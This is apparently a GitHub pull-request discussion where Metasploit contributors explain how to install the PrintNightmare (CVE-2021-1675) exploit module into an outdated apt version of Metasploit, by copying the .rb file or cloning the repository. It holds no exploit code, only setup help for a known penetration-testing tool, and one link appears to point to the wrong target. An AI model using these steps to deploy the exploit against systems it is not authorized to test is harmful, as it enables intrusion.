Can you just copy the ruby code into: /usr/share/metasploit-framework/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb

Hey @BettyNutz if you are using the apt repository version of Metasploit, which seems to be the case, it can take a very long time before the packages will be updated to the current version, so apt update isn't going to do you any good for quite a while. If you want to use this module now, you have two options:

1. As you said, you can simply copy the `cve_2021_1675_printnightmare.rb` file from GitHub to your local system. You can find the raw version [here](https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb).

2. You can clone the metasploit-framework repository and manually run `git pull` every now and then to update it with the latest exploits. In order to be able to run metasploit from within the cloned repo, you need to make sure all necessary dependencies are installed. You can use [this](https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/admin/dcerpc/cve_2021_1675_printnightmare.rb) article. If you don't plan to do any dev work on the framework, you can ignore all the git stuff.

i couldn't see that raw button anywhere on this page so i just pulled the code from the last .rb code box that didnt say 'outdated'. ..added it to msf and did an update. all good thanks! - take it if i clone the metasploit-framework repository and manually run a git pull it will overwrite the copy of this CVE-2021-1675 / CVE-2021-34527 AKA PrintNightmare
i manually 'created' in MSF?

@bcoles
Copy link
Contributor

bcoles commented Jul 19, 2021

take it if i clone the metasploit-framework repository and manually run a git pull it will overwrite the copy of this cve i manually 'created' in MSF?

No idea what cve youre talking about it, but if there are conflicts during a git pull then git will warn you and not overwrite files.

@ErikWynter
Copy link
Contributor

i couldn't see that raw button anywhere on this page so i just pulled the code from the last .rb code box that didnt say 'outdated'. ..added it to msf and did an update. all good thanks!

@BettyNutz there is no raw button here because this is the page for the pull request that adds this module, not the module itself. To get to the actual module as it has been included in the framework, you need to go to the repo, and then navigate to modules > auxiliary > admin > dcerpc > cve_2021_1675_printnightmare.rb , which will lead you here. The raw button is on the right just above where the code begins.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs hotness Something we're really excited about module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Development

Successfully merging this pull request may close these issues.

9 participants